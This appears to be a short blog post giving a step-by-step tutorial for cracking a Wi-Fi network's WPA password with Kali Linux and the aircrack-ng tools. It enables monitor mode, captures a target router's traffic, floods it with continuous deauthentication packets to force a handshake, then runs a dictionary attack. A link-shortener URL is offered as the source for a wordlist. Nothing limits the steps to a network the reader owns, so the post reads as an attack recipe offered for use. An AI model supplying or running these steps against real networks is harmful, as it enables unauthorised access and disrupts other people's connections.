First!
download KALI LINUX FROM OFFICIAL WEBSITE "https://www.kali.org/downloads/" and boot it on your pc or laptop then open a terminal:
And type
"airmon-ng start wlan0"
THEN!
Type "airodump-ng wlan0mon" or your moniter mode like mon0 etc
press enter then this window will appear
AFTER THIS STEP
TYPE "airodump-ng -c [channel] -bssid [BSSID] -w [output]"
after this open a new terminal and send deauthentication packets to router by this command
"aireplay-ng -0 0 -a [bssid] [interface]"
AFTER CAPTURING HANDSHAKE close all terminals
and open a new terminal and type
"aircrack-ng -w [path to dictionary] [.cap file from output]"
and press enter
if you don't have a dictionary file
Download it from "http://adf.ly/1lKezs"







No comments:
Post a Comment